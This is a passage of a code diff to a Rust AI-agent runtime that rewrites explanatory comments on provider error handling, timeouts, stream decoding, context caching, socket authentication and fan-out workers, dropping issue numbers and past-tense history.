+        // A raw JSON blob is not a run status. The message must say what to
+        // do; the blob stays available.
         let err = ProviderError::Unavailable {
             reason: UnavailableReason::CreditsExhausted,
             detail: "HTTP 402 Payment Required: {\"error\":{}}".into(),
@@ -2295,9 +2292,9 @@ mod tests {
 
     #[tokio::test]
     async fn check_http_response_402_becomes_unavailable_not_api_error() {
-        // The exact shape from issue #201: OpenRouter answering 402 with its
-        // credit-balance JSON. Before, this was an `ApiError` whose whole
-        // message was the blob, and one of them killed the run.
+        // The shape that matters: OpenRouter answering 402 with its
+        // credit-balance JSON. As an `ApiError` the whole message is the blob,
+        // and it kills the run.
         let body = br#"{"error":{"message":"This request requires more credits, or fewer max_tokens. You requested up to 65536 tokens, but can only afford 28."}}"#;
         let response = spawn_mock_response(402, "Payment Required", &[], body).await;
         let err = check_http_response(response, None).await.unwrap_err();
@@ -2383,7 +2380,7 @@ mod tests {
             .unwrap_err();
         // The header reaches the limiter *and* the error: the limiter paces the
         // next request, the error tells the retry loop how long to wait before
-        // repeating this one (issue #417).
+        // repeating this one.
         assert_eq!(
             err.retry_advice(),
             RetryAdvice {
@@ -2578,10 +2575,10 @@ mod tests {
 
     /// A body that stops early is a *transport* failure, not a parse failure.
     ///
-    /// This is the regression the whole split exists for: a socket that dies
-    /// mid-body (a reset, or a machine that slept through the response) used to
-    /// surface as `InvalidResponse`, which `is_transient` calls permanent - so a
-    /// run with dozens of iterations of work behind it died without one retry.
+    /// This is what the whole split exists for: a socket that dies mid-body (a
+    /// reset, or a machine that slept through the response) surfacing as
+    /// `InvalidResponse` - which `is_transient` calls permanent - kills a run
+    /// with dozens of iterations of work behind it without one retry.
     #[tokio::test]
     async fn decode_json_reports_a_truncated_body_as_a_transport_failure() {
         // Declares 200 bytes, sends 9, then hangs up.

--- a/crates/leviath-providers/src/provider/http.rs
+++ b/crates/leviath-providers/src/provider/http.rs
@@ -33,8 +33,8 @@ pub const DEFAULT_INFERENCE_TIMEOUT_SECS: u64 = 900;
 /// The deadline for a call that is *about* inference rather than inference
 /// itself: counting a prompt's tokens, listing what a provider serves.
 ///
-/// These carried the 15-minute inference ceiling, which is the wrong number for
-/// them by two orders of magnitude. Nothing generates here, so the whole answer
+/// The 15-minute inference ceiling is the wrong number for these by two orders
+/// of magnitude. Nothing generates here, so the whole answer
 /// is one small body that either comes back promptly or is not coming, and both
 /// callers already cope with not getting one - `count_tokens` falls back to the
 /// local heuristic, a failed model list is reported and the provider is asked
@@ -43,8 +43,8 @@ pub const DEFAULT_INFERENCE_TIMEOUT_SECS: u64 = 900;
 /// Getting it wrong is not academic: `count_tokens` runs on the dispatch path,
 /// *before* the request is sent and outside the `job_timeout` that bounds the
 /// call itself, so a provider that accepts the connection and never answers
-/// used to freeze the run there for fifteen minutes with nothing in flight to
-/// show for it.
+/// would otherwise freeze the run there for fifteen minutes with nothing in
+/// flight to show for it.
 pub const SIDE_CALL_TIMEOUT_SECS: u64 = 30;
 
 /// Apply the per-call inference deadline to an outbound provider request.

--- a/crates/leviath-providers/src/provider/stream.rs
+++ b/crates/leviath-providers/src/provider/stream.rs
@@ -110,10 +110,8 @@ impl Utf8Carry {
 
 /// A byte stream cut into [`StreamChunk`]s by a provider-specific framer.
 ///
-/// One `poll_next` for every provider. Three of them used to carry a copy of
-/// this loop each - the same buffer, the same UTF-8 handling, the same
-/// transport-error mapping - with only the framing call differing, and the
-/// same eight-line comment about why the inner stream is boxed, three times.
+/// One `poll_next` for every provider: one buffer, one UTF-8 handling, one
+/// transport-error mapping, with only the framing call differing per provider.
 pub struct FramedStream {
     inner: ByteStream,
     buffer: String,
@@ -425,8 +423,8 @@ mod tests {
     /// The transport cuts wherever it likes, including through a character.
     /// reqwest's `bytes_stream()` hands over whatever the socket had, so a
     /// four-byte emoji is routinely two bytes in one chunk and two in the
-    /// next; both halves used to be thrown away, and the run lost the whole
-    /// chunk around them with no error.
+    /// next. Both halves have to be joined, or the run loses the whole chunk
+    /// around them with no error.
     #[tokio::test]
     async fn a_character_split_across_two_chunks_arrives_whole() {
         let text = "done 🎉\n".as_bytes();

--- a/crates/leviath-providers/src/rhai_provider/convert.rs
+++ b/crates/leviath-providers/src/rhai_provider/convert.rs
@@ -265,7 +265,7 @@ pub fn map_rhai_err(err: Box<EvalAltResult>) -> ProviderError {
                 // gets back from an HTTP call, so it classifies the same way:
                 // an OpenAI-compatible endpoint answering 402 through a Rhai
                 // provider must fail over and trip the breaker exactly as the
-                // native OpenRouter provider does (issue #201). The script has
+                // native OpenRouter provider does. The script has
                 // no status code to hand us separately, so it is read back out
                 // of the message.
                 Some("api") => match crate::provider::UnavailableReason::from_message(&message) {

--- a/crates/leviath-providers/src/rhai_provider/convert/tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/convert/tests.rs
@@ -163,7 +163,7 @@ fn map_err_kinds() {
 }
 
 /// A script talking to an OpenAI-compatible endpoint must fail over and trip
-/// the breaker exactly as a built-in provider does (issue #201). It throws one
+/// the breaker exactly as a built-in provider does. It throws one
 /// formatted string, so the classification has to come out of the message.
 #[test]
 fn a_scripts_payment_error_classifies_like_a_built_in_providers() {

--- a/crates/leviath-providers/src/rhai_provider/engine.rs
+++ b/crates/leviath-providers/src/rhai_provider/engine.rs
@@ -70,8 +70,8 @@ fn register_pure_fns(engine: &mut Engine, env_allowlist: Arc<Vec<String>>) {
     engine.register_fn("to_json", to_json_fn);
     // Rhai's own `map_basic` package registers `to_json(&mut Map)`. An object
     // map is the argument every provider script actually passes, and that
-    // signature is more specific than the `Dynamic` one above, so it used to
-    // win overload resolution and the serde encoder here was never reached.
+    // signature is more specific than the `Dynamic` one above, so it wins
+    // overload resolution and the serde encoder here is never reached.
     // Rhai's formatter (`format_map_as_json`) writes strings with Rust's
     // `Debug`, which escapes any non-printable character as `\u{202f}`. That is
     // not a JSON escape, so the request body stopped being JSON the moment a

--- a/crates/leviath-providers/src/rhai_provider/engine/tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/engine/tests.rs
@@ -217,8 +217,9 @@ fn print_and_debug_are_silenced() {
 /// Rhai's `Debug`-escaped lookalike.
 ///
 /// Rhai's `map_basic` package registers `to_json(&mut Map)`, and that
-/// signature used to beat ours, so every request body a provider script built
-/// went through `format_map_as_json`. That writes strings with `Debug`, which
+/// signature beats ours unless the same one is registered over it, sending
+/// every request body a provider script builds through `format_map_as_json`.
+/// That writes strings with `Debug`, which
 /// spells a narrow no-break space `\u{202f}`. JSON has no such escape, so the
 /// API refused the whole request and named the offset it choked on.
 ///

--- a/crates/leviath-providers/src/rhai_provider/host.rs
+++ b/crates/leviath-providers/src/rhai_provider/host.rs
@@ -368,9 +368,9 @@ pub(crate) fn unsupported_content_type(content_type: Option<&str>) -> Option<Str
 ///
 /// This is the shape a compressed body takes after a lossy UTF-8 decode, and it
 /// is the last line of defence behind the `gzip`/`brotli`/`zstd` features: a
-/// server that compresses unsolicited (finance.yahoo.com does) used to land a
-/// whole gzip member in a research agent's sources region, and nothing noticed
-/// because the tool's own emptiness check only catches *short* output.
+/// server that compresses unsolicited (finance.yahoo.com does) otherwise lands
+/// a whole gzip member in a research agent's sources region, and nothing else
+/// notices because the tool's own emptiness check only catches *short* output.
 ///
 /// The ratio, not a count: a legitimate page may carry a stray replacement
 /// character from a genuinely malformed byte, but not one in ten.

--- a/crates/leviath-providers/src/rhai_provider/mod.rs
+++ b/crates/leviath-providers/src/rhai_provider/mod.rs
@@ -108,10 +108,10 @@ pub fn inspect_source(label: &str, src: &str) -> Result<SourceReport> {
 
 /// Check that a compiled script defines `initialize` and `inference`.
 ///
-/// Both are required, but only `initialize` used to be caught at load, because
-/// loading calls it. A script with no `inference` compiled, initialized and
-/// cached, then failed at the first real inference - by which point a run had
-/// started and the failure looked like a provider outage rather than a typo.
+/// Both are required, but only `initialize` is caught by loading, because
+/// loading calls it. A script with no `inference` compiles, initializes and
+/// caches, then fails at the first real inference - by which point a run has
+/// started and the failure looks like a provider outage rather than a typo.
 /// Reading it off the AST moves that to the moment the script is read.
 fn require_entry_points(label: &str, ast: &AST) -> Result<()> {
     for (name, params, signature) in REQUIRED_FNS {
@@ -582,10 +582,10 @@ impl Provider for RhaiProvider {
     ///
     /// The default implementation reads the compiled-in capability table, which
     /// a script provider does not have: [`Self::capabilities`] answers the same
-    /// `base` for every model it has no override for, so the default said "no"
-    /// to everything. A local box serving one fast model could therefore never
-    /// win a blueprint entry that named that model, however the machine set
-    /// `default_provider` (issue #598).
+    /// `base` for every model it has no override for, so the default says "no"
+    /// to everything and a local box serving one fast model can never win a
+    /// blueprint entry that names that model, however the machine sets
+    /// `default_provider`.
     ///
     /// Three sources, cheapest evidence last:
     ///

--- a/crates/leviath-providers/src/rhai_provider/tests.rs
+++ b/crates/leviath-providers/src/rhai_provider/tests.rs
@@ -967,8 +967,8 @@ fn check_source_reports_a_syntax_error() {
     );
 }
 
-/// The gap this exists to close: a script with no `inference` used to compile,
-/// initialize and cache, then fail at the first real inference.
+/// The gap this exists to close: a script with no `inference` otherwise
+/// compiles, initializes and caches, then fails at the first real inference.
 #[test]
 fn check_source_rejects_a_script_with_no_inference() {
     let message = refusal(check_source("mock.rhai", "fn initialize(config) { #{} }").unwrap_err());
@@ -1035,8 +1035,8 @@ fn from_source_rejects_a_script_with_no_inference() {
 ///
 /// The default `serves_model` reads the compiled-in capability table, which a
 /// script does not have: `capabilities` answers the same base for every model
-/// it has no override for, so the default said "no" to everything and a local
-/// model could never win a blueprint entry that named it (issue #598). Refusing
+/// it has no override for, so the default says "no" to everything and a local
+/// model can never win a blueprint entry that names it. Refusing
 /// is still the right answer when there is no evidence - a provider that
 /// claimed every model would be far worse - so this pins that floor.
 #[test]

--- a/crates/leviath-runtime/src/components/block_cache.rs
+++ b/crates/leviath-runtime/src/components/block_cache.rs
@@ -27,7 +27,7 @@ pub(super) const CACHE_CHUNK_TOKENS: usize = 2048;
 /// after the region's newest content - so the moment the region grows, the entry
 /// named there is unreadable and every call rewrites the lot at the write
 /// premium. Measured before this: 456,860 cache-write tokens across twelve
-/// calls with zero reads (issue #474).
+/// calls with zero reads.
 ///
 /// Chunking gives the region interior boundaries. Entries are packed greedily
 /// and a full chunk is never repacked, so a boundary that existed last turn
@@ -135,14 +135,13 @@ pub(super) fn push_bracketed(
 /// rather than how it changes.
 ///
 /// `temporary` and `clearable` are lifecycle kinds: one is dropped at stage
-/// exit, the other on demand. Both used to be tagged `Never`, which reads that
-/// lifecycle as "this content never holds still" - and for the boundary it is
-/// right, since caching across a wholesale drop would buy nothing. Between
-/// those boundaries it is wrong. A stage that reads a corpus into a `temporary`
-/// region and then works through it for forty calls has an append-mostly region
-/// that changes at the tail, which is the shape chunking exists for; tagging it
-/// `Never` re-sent the whole corpus at full rate on every one of those calls
-/// (issue #490: 5.36M tokens across 46 calls, the largest cost line in the run).
+/// exit, the other on demand. Tagging them `Never` reads that lifecycle as
+/// "this content never holds still" - right at the boundary, since caching
+/// across a wholesale drop buys nothing, and wrong between them. A stage that
+/// reads a corpus into a `temporary` region and then works through it for forty
+/// calls has an append-mostly region that changes at the tail, which is the
+/// shape chunking exists for; `Never` re-sends the whole corpus at full rate on
+/// every one of those calls, measured once at 5.36M tokens across 46 calls.
 ///
 /// The kind cannot answer this and the author can, so it is read from the
 /// declaration. `Rewritten` is the default, so a region that says nothing keeps
@@ -241,10 +240,10 @@ pub(super) fn system_prefix_hash(blocks: &[leviath_providers::SystemBlock]) -> u
 /// that pays is stable content first and churn last, whatever those blocks are
 /// otherwise made of.
 ///
-/// The cache hint breaks ties within a tier. It used to lead, and it is derived
-/// from the region's *kind*, which is why this needed changing: a pinned region
-/// sounds immutable and is written constantly, so ordering by kind put churn at
-/// the front of the prefix and invalidated everything behind it (issue #474).
+/// The cache hint breaks ties within a tier rather than leading. It is derived
+/// from the region's *kind*, and a pinned region sounds immutable while being
+/// written constantly, so leading with it puts churn at the front of the prefix
+/// and invalidates everything behind it.
 pub(super) fn block_sort_priority(block: &leviath_providers::SystemBlock) -> (u8, u8) {
     let volatility = match block.volatility {
         leviath_core::Volatility::Stable => 0,
@@ -489,7 +488,7 @@ mod tests {
     }
 
     /// Nothing is lost or reordered by splitting: the chunks rejoin into exactly
-    /// the text a single block used to carry.
+    /// the text one unsplit block carries.
     #[test]
     fn chunking_preserves_the_content_exactly() {
         let all = entries(25, &"word ".repeat(120));

--- a/crates/leviath-runtime/src/components/context_window.rs
+++ b/crates/leviath-runtime/src/components/context_window.rs
@@ -129,12 +129,11 @@ pub struct ContextWindow {
 
     /// Regions the current stage does not attend to.
     ///
-    /// Held, not deleted. A stage layout that omits a region used to have it
-    /// dropped from the window entirely, so re-declaring it in a later stage
-    /// brought it back empty - which made the feature unusable for the thing it
-    /// looks designed for, narrowing what one stage sees in a pipeline whose
-    /// later stages still need the data. Omission now means "not assembled for
-    /// this stage" and nothing else.
+    /// Held, not deleted. Dropping an omitted region from the window entirely
+    /// brings it back empty when a later stage re-declares it, which makes the
+    /// feature unusable for the thing it looks designed for: narrowing what one
+    /// stage sees in a pipeline whose later stages still need the data.
+    /// Omission means "not assembled for this stage" and nothing else.
     ///
     /// Reset on every stage entry by `crate::context_setup::apply_layout`, so
     /// it describes the stage in front of it rather than accumulating.
@@ -416,7 +415,7 @@ impl ContextWindow {
         let mut system_blocks = Vec::new();
         let mut messages: Vec<leviath_providers::Message> = Vec::new();
         // Messages a custom region rendered. Held apart from the conversation
-        // and spliced in front of it after the loop (issue #486).
+        // and spliced in front of it after the loop.
         let mut preamble: Vec<leviath_providers::Message> = Vec::new();
         // One entry per `UntilChanged` system block, in assembly order, holding
         // the newest entry timestamp of the region that produced it. Feeds the
@@ -591,7 +590,7 @@ impl ContextWindow {
                 }
                 // Both say when the region is thrown away, not how it moves
                 // in between, so the hint comes from the declaration - see
-                // `lifecycle_cache_hint` (issue #490).
+                // `lifecycle_cache_hint`.
                 leviath_core::RegionKind::Temporary | leviath_core::RegionKind::Clearable => {
                     let hint = lifecycle_cache_hint(region.volatility);
                     push_bracketed(&mut system_blocks, region, hint);
@@ -667,13 +666,12 @@ impl ContextWindow {
         // thing that is now is the dialogue it is having. Every other region is
         // reference material, however recently it was written.
         //
-        // Only a custom region can render into the conversation at all, and it
-        // rendered wherever its author happened to declare it - so a region
-        // declared after the conversation put its contents *behind* the last
-        // user turn. On a small region that is untidy; on one holding a document
-        // corpus it replaces the dialogue in the position the model weighs most
-        // heavily, and the agent stops behaving like it is in a conversation
-        // (issue #486).
+        // Only a custom region can render into the conversation at all, and
+        // rendering it wherever its author happened to declare it puts a region
+        // declared after the conversation *behind* the last user turn. On a
+        // small region that is untidy; on one holding a document corpus it
+        // replaces the dialogue in the position the model weighs most heavily,
+        // and the agent stops behaving like it is in a conversation.
         //
         // Splicing rather than sorting: a region declared before the
         // conversation already rendered in front of it and stays exactly where
@@ -827,7 +825,7 @@ impl ContextWindow {
         // one request. A block-shaped message that emptied out is already
         // dropped by the tool-pair sanitizer above; this catches the text-shaped
         // ones, and it runs before the two guards below so that a conversation
-        // left empty by the drop still gets its fallback turn (issue #495).
+        // left empty by the drop still gets its fallback turn.
         messages.retain(|m| match &m.content {
             leviath_providers::MessageContent::Text(text) => !text.trim().is_empty(),
             leviath_providers::MessageContent::Blocks(blocks) => !blocks.is_empty(),

--- a/crates/leviath-runtime/src/components/mod.rs
+++ b/crates/leviath-runtime/src/components/mod.rs
@@ -188,7 +188,7 @@ pub enum AgentStatus {
 impl AgentStatus {
     /// The short, stable lowercase word for this status.
     ///
-    /// One table, because three used to drift independently: `lev ps`, the
+    /// One table, because three readers otherwise drift apart: `lev ps`, the
     /// [`WorldEvent`](crate::host::WorldEvent) stream (and through it the REST
     /// WebSocket), and the `check_agent` tool result the model reads. The
     /// strings are part of the daemon's wire contract, so they are fixed here
@@ -260,7 +260,7 @@ mod context_window;
 pub use context_window::*;
 
 /// Compiled stage-hook scripts for an agent, keyed by the script path the
-/// blueprint wrote (issue #260).
+/// blueprint wrote.
 ///
 /// Populated once at spawn by the CLI, which resolves blueprint-dir-relative
 /// paths and compile-checks the files - the same lifecycle
@@ -2668,11 +2668,11 @@ mod tests {
 
     // ─── the conversation ends the request (issue #486) ──────────────────
 
-    /// A custom region is the only kind that can render into the conversation,
-    /// and it used to render at whatever position its author declared it - so
-    /// one declared after the conversation put its contents behind the last
-    /// user turn. With a document corpus in that region, the thing sitting in
-    /// the position the model weighs most heavily stopped being the dialogue.
+    /// A custom region is the only kind that can render into the conversation.
+    /// Rendering it at whatever position its author declared puts a region
+    /// declared after the conversation behind the last user turn, so with a
+    /// document corpus in it the thing sitting where the model weighs most
+    /// heavily is no longer the dialogue.
     #[test]
     fn a_custom_region_declared_after_the_conversation_still_renders_before_it() {
         let mut window = ContextWindow::new(100_000);

--- a/crates/leviath-runtime/src/context_setup.rs
+++ b/crates/leviath-runtime/src/context_setup.rs
@@ -15,7 +15,7 @@ use crate::ContextWindow;
 /// Initialize a [`ContextWindow`] from a blueprint and seed its regions from a
 /// name→content map. Adds each layout region plus the infra
 /// `tool_results`/`conversation` regions, then fills each seed whose key matches
-/// a declared region. The `task` key gets the legacy fallback: if there is no
+/// a declared region. The `task` key gets a fallback of its own: if there is no
 /// region literally named `task`, it seeds the first pinned region instead.
 /// Pure over the window (no engine/entity), so both the imperative engine and
 /// the ECS pipeline's spawner can share it.
@@ -71,7 +71,7 @@ pub(crate) fn init_window_seeded(
     }
 
     for (name, content) in seeds {
-        // The task key keeps its legacy fallback: prefer a region named "task",
+        // The task key has a fallback of its own: prefer a region named "task",
         // else the first pinned region. Every other key targets its region by
         // exact name (unknown names are already rejected upstream, so ignore
         // them here to keep this pure/infallible).
@@ -144,9 +144,9 @@ fn task_region_name(blueprint: &Blueprint) -> Option<String> {
         .map(|r| r.name.clone())
 }
 
-/// Initialize a [`ContextWindow`] seeding only the task text - the thin
-/// back-compat wrapper over `init_window_seeded` used by callers that carry a
-/// single task string (the imperative engine and existing tests).
+/// Initialize a [`ContextWindow`] seeding only the task text - the one-seed
+/// convenience over `init_window_seeded`, for callers that carry a single task
+/// string.
 pub fn init_window(window: &mut ContextWindow, blueprint: &Blueprint, task: &str) {
     let seeds = HashMap::from([("task".to_string(), task.to_string())]);
     init_window_seeded(window, blueprint, &seeds);
@@ -180,8 +180,8 @@ pub(crate) fn apply_layout(window: &mut ContextWindow, layout: &ContextLayout) {
             for entry in &existing.content {
                 let _ = new_region.carry_entry(entry.clone());
             }
-            // The region-level taint state carries wholesale too; the rebuild
-            // used to silently reset it.
+            // The region-level taint state carries wholesale too: rebuilding
+            // instead of carrying silently resets it.
             new_region.taint = existing.taint.clone();
         }
 
@@ -499,7 +499,7 @@ mod tests {
     #[test]
     fn init_window_seeded_task_key_falls_back_to_first_pinned() {
         // No region literally named "task": the "task" seed key still lands in
-        // the first pinned region (legacy fallback), while a named key does not.
+        // the first pinned region (the task fallback), while a named key does not.
         let bp = blueprint_with(vec![RegionDefinition::new(
             "system".to_string(),
             RegionKind::Pinned,
@@ -677,9 +677,9 @@ mod tests {
 
     #[test]
     fn apply_layout_preserves_entry_kinds_and_taint_across_swap() {
-        // Regression: the carry used to rebuild entries via `add_entry`, which
-        // stamped every carried entry `EntryKind::Text` (destroying tool_use/
-        // tool_result pairing) and silently reset region-level taint.
+        // The carry must not rebuild entries via `add_entry`: that stamps
+        // every carried entry `EntryKind::Text`, destroying tool_use/
+        // tool_result pairing, and silently resets region-level taint.
         let bp = blueprint_with(vec![RegionDefinition::new(
             "task".to_string(),
             RegionKind::Pinned,

--- a/crates/leviath-runtime/src/control_socket/mod.rs
+++ b/crates/leviath-runtime/src/control_socket/mod.rs
@@ -644,7 +644,7 @@ where
 }
 
 /// The reply to a successful `authenticate`: `Welcome` when the client asked
-/// who it reached, the historical bare `Ok` when it did not.
+/// who it reached, the bare `Ok` an older client expects when it did not.
 fn authenticated_reply(hello: bool, identity: &DaemonIdentity) -> ControlResponse {
     match hello {
         true => ControlResponse::Welcome {
@@ -1039,9 +1039,9 @@ mod tests {
         let (read_half, mut write_half) = tokio::io::split(stream);
         let mut lines = BufReader::new(read_half).lines();
 
-        // Several requests down one connection. Each is well under the cap, but
-        // together they exceed a budget that is never refilled - which is what
-        // the old shape did.
+        // Several requests down one connection. Each is well under the cap,
+        // but together they exceed it, so the cap has to be per request and not
+        // a connection budget that is never refilled.
         let req = ControlRequest::List;
         let mut line = serde_json::to_string(&req).unwrap();
         line.push('\n');
@@ -1313,9 +1313,9 @@ mod tests {
     }
 
     /// A subscriber that closes its half of the connection ends the stream
-    /// even when no event ever arrives - previously the daemon-side task (and
-    /// its broadcast receiver) lived until the next write failed, which on an
-    /// idle daemon is never.
+    /// even when no event ever arrives. Waiting for the next write to fail
+    /// instead keeps the daemon-side task, and its broadcast receiver, alive
+    /// for ever on an idle daemon.
     #[tokio::test]
     async fn stream_events_returns_on_client_eof_without_any_event() {
         let (tx, rx) = broadcast::channel::<WorldEvent>(4);
@@ -1551,11 +1551,10 @@ mod tests {
         server.await.unwrap();
     }
 
-    /// The regression that mattered in production: every real daemon requires
-    /// a token, and `subscribe` used to skip the handshake entirely - so the
-    /// serve gateway's event stream was refused on every connect, read the
-    /// refusal as a closed stream, and re-subscribed twice a second forever
-    /// while no live event ever reached a WebSocket.
+    /// Every real daemon requires a token, so `subscribe` has to do the
+    /// handshake. Skipping it gets the serve gateway's event stream refused on
+    /// every connect, read as a closed stream, and re-subscribed twice a second
+    /// forever while no live event reaches a WebSocket.
     #[tokio::test]
     async fn subscribe_authenticates_against_a_tokened_daemon() {
         let (events, _r) = broadcast::channel::<WorldEvent>(16);

--- a/crates/leviath-runtime/src/control_socket/unix.rs
+++ b/crates/leviath-runtime/src/control_socket/unix.rs
@@ -108,14 +108,11 @@ pub fn bind_control_listener(id: &Path) -> std::io::Result<ControlListener> {
     let _ = leviath_sys::secure_dir_perms(parent);
 
     let listener = tokio::net::UnixListener::bind(id)?;
-    // Owner-only on the socket itself. On Linux the mode is enforced on
-    // `connect`; on macOS and the BSDs it historically is not, which is why the
-    // per-connection peer check in `accept_authorized` is the real gate and this
-    // is defence in depth rather than the whole story.
-    // Best-effort, like the directory above: `chmod` on a socket we just created
-    // and own does not realistically fail, and the peer check in `accept` - not
-    // this mode - is what actually holds on macOS and the BSDs, where socket
-    // permissions are not consulted at `connect` time.
+    // Owner-only on the socket itself. Linux enforces the mode on `connect`;
+    // macOS and the BSDs do not consult socket permissions there at all, which
+    // is why the per-connection peer check in `accept_authorized` is the real
+    // gate and this is defence in depth. Best-effort, like the directory above:
+    // `chmod` on a socket we just created and own does not realistically fail.
     let _ = leviath_sys::secure_file_perms(id);
     Ok(ControlListener(listener))
 }

--- a/crates/leviath-runtime/src/custom_region.rs
+++ b/crates/leviath-runtime/src/custom_region.rs
@@ -876,7 +876,7 @@ mod tests {
         let (_, messages) = render(&region, Some(&script(src)), false);
         // Asserted on the block rather than on its serialized form: the field
         // is deliberately never serialized, because it is one provider's and
-        // history is replayed to whichever provider runs next (issue #575).
+        // history is replayed to whichever provider runs next.
         // `openai_compat` re-attaches it by hand for the providers that want it.
         assert_eq!(
             tool_signature(&messages[0].content).as_deref(),

--- a/crates/leviath-runtime/src/dynamic_interaction.rs
+++ b/crates/leviath-runtime/src/dynamic_interaction.rs
@@ -946,9 +946,9 @@ mod tests {
 
     #[tokio::test]
     async fn unattended_answers_every_prompt_without_a_hub() {
-        // Issue #107: `--yolo` means "run without a human", so a prompt that
-        // waits for one parks the run forever. Every dynamic-interaction tool
-        // must come back with something the model can act on.
+        // `--yolo` means "run without a human", so a prompt that waits for one
+        // parks the run forever. Every dynamic-interaction tool must come back
+        // with something the model can act on.
         let backend = UnattendedInteraction;
 
         // A confirmation is approved - that is what the flag promises.

--- a/crates/leviath-runtime/src/embed/spawner.rs
+++ b/crates/leviath-runtime/src/embed/spawner.rs
@@ -105,8 +105,8 @@ impl EmbedSpawner {
 
         let agent_name = blueprint.name.clone();
         let num_stages = blueprint.stages.len();
-        // Fixed for the run, so it is answered while the blueprint is in hand
-        // (issue #192). Embedders get the same treatment as daemon runs.
+        // Fixed for the run, so it is answered while the blueprint is in
+        // hand. Embedders get the same treatment as daemon runs.
         let outcome_flags = RunOutcomeFlags::for_blueprint(&blueprint);
         let model_label = stages
             .first()
@@ -583,8 +583,8 @@ conversation = { kind = "sliding_window", max_items = 10, max_tokens = 2000 }
 
     #[tokio::test]
     async fn a_stage_with_no_registered_provider_is_a_spawn_error() {
-        // Issue #190: an embedder that never registered the provider a stage
-        // names used to get a live agent that could not take a single turn.
+        // An embedder that never registered the provider a stage names must
+        // not get a live agent that cannot take a single turn.
         let dir = tempfile::tempdir().unwrap();
         let manifest = r#"[agent]
 name = "ghostly"

--- a/crates/leviath-runtime/src/embed/world.rs
+++ b/crates/leviath-runtime/src/embed/world.rs
@@ -180,7 +180,7 @@ impl AgentWorldBuilder {
     ///
     /// Call it once per target, best first. This is what keeps a blueprint
     /// that names exactly one model running when that provider runs out of
-    /// credits (issue #201).
+    /// credits.
     pub fn fallback_model(mut self, provider: impl Into<String>, model: impl Into<String>) -> Self {
         self.defaults
             .fallback_order
@@ -407,9 +407,9 @@ impl AgentWorld {
     /// the world does not know the run).
     ///
     /// The counterpart to [`status`](Self::status): that says whether a run is
-    /// done, this says what it concluded. An embedder that only watched
-    /// [`EventStream`] for a `Completed` event used to have no way to read a
-    /// result except by scraping the log stream.
+    /// done, this says what it concluded. An embedder watching [`EventStream`]
+    /// for a `Completed` event has no other way to read a result short of
+    /// scraping the log stream.
     pub async fn result(&self, id: &RunId) -> Option<leviath_core::output::FinalOutput> {
         self.ask(|reply| ControlOp::Result {
             run_id: id.0.clone(),
@@ -1054,7 +1054,7 @@ conversation = { kind = "sliding_window", max_items = 40, max_tokens = 20000 }
     }
 
     /// The failover chain is ordered and additive, and setting a default model
-    /// afterwards must not wipe it (issue #201).
+    /// afterwards must not wipe it.
     #[test]
     fn fallback_models_accumulate_in_order_beside_the_default() {
         let builder = AgentWorldBuilder::new()

--- a/crates/leviath-runtime/src/fanout.rs
+++ b/crates/leviath-runtime/src/fanout.rs
@@ -666,16 +666,15 @@ pub(crate) fn fan_out_collect(world: &mut World) {
         // components are dead weight - mark it for `slim_merged_workers`, which
         // drops them once the terminal snapshot has reached the persistence
         // lane. The entity itself stays (the host only despawns it when the
-        // parent goes terminal), but without its context window: previously
-        // every finished fan-out worker kept a full window resident for the
-        // whole remainder of the parent's run.
+        // parent goes terminal), but without its context window, which would
+        // otherwise stay resident for the whole remainder of the parent's run.
         let mut still_active = Vec::with_capacity(w.active.len());
         for aw in std::mem::take(&mut w.active) {
             match worker_terminal_result(world, aw.entity) {
                 Some(result) => {
                     // Before the marker below hands this worker to
                     // `slim_merged_workers`, which drops its context window:
-                    // after that its bibliography is only on disk (issue #574).
+                    // after that its bibliography is only on disk.
                     merge_worker_sources(world, parent, aw.entity, &aw.item_id);
                     match result {
                         Ok(content) => w.summaries.push((aw.item_id, content)),
@@ -996,14 +995,13 @@ fn start_worker(
 ///
 /// A worker that called `submit_output` contributes exactly what it submitted.
 /// Otherwise this falls back to the text of its last assistant message, which is
-/// what every worker used to contribute and is usually wrong: a worker whose
-/// final turn was a tool call has no trailing text, so the merge stage received
-/// an empty string, which is silently indistinguishable from a worker that had
-/// nothing to say.
+/// usually wrong: a worker whose final turn was a tool call has no trailing
+/// text, so the merge stage gets an empty string, silently indistinguishable
+/// from a worker that had nothing to say.
 ///
-/// The fallback stays because it costs nothing and an existing blueprint that
-/// happens to end on a text turn keeps working. A blueprint that wants the
-/// guarantee sets `require_output` on its worker stage.
+/// The fallback stays because it costs nothing and a blueprint that happens to
+/// end on a text turn keeps working. A blueprint that wants the guarantee sets
+/// `require_output` on its worker stage.
 ///
 /// A worker whose stage set `require_output` and that finished without one is
 /// reported as a **failure**, not as a success with empty content. It reached
@@ -2287,9 +2285,8 @@ mod tests {
     }
 
     /// A merged worker keeps its heavy components until its terminal snapshot
-    /// has been dispatched, then sheds them - previously every finished
-    /// fan-out worker kept a full context window resident until the parent
-    /// went terminal.
+    /// has been dispatched, then sheds them, so a finished worker does not hold
+    /// a full context window resident until the parent goes terminal.
     #[test]
     fn merged_workers_are_slimmed_once_their_terminal_state_is_persisted() {
         let mut world = World::new();
@@ -2623,11 +2620,10 @@ mod tests {
 
     // ── worker_terminal_result / build_report / inject_conversation ───────────
 
-    /// The bug this feature exists to fix. A worker's contribution used to be
-    /// the text of its last assistant message, so a worker whose final turn was
-    /// a tool call contributed an empty string - and the shipped
-    /// a worker told to report what it did writes that report into exactly that
-    /// channel.
+    /// A submitted output beats the last assistant message. A worker whose
+    /// final turn is a tool call has no trailing text, so the fallback alone
+    /// hands the merge stage an empty string; `submit_output` is the channel a
+    /// worker told to report what it did writes into.
     #[test]
     fn a_submitted_answer_beats_the_last_assistant_text() {
         let mut world = World::new();
@@ -2635,8 +2631,8 @@ mod tests {
             .spawn((
                 parent_state(),
                 InferenceResult {
-                    // What the old code would have handed the merge stage: the
-                    // trailing aside, not the deliverable.
+                    // What the last-turn fallback alone would hand the merge
+                    // stage: the trailing aside, not the deliverable.
                     response: "Let me run the tests one more time.".to_string(),
                     tool_calls: vec![],
                     tokens_used: 0,
@@ -2783,9 +2779,9 @@ mod tests {
         assert!(!worker_requires_output(&world, past_end));
     }
 
-    /// A blueprint that never opted in keeps the old fallback, empty text and
-    /// all. Turning that into a failure would break every fan-out written before
-    /// `require_output` existed.
+    /// A blueprint that never opted in keeps the last-turn fallback, empty text
+    /// and all. Turning that into a failure would break every fan-out that does
+    /// not declare `require_output`.
     #[test]
     fn a_worker_that_owes_nothing_keeps_the_last_turn_fallback() {
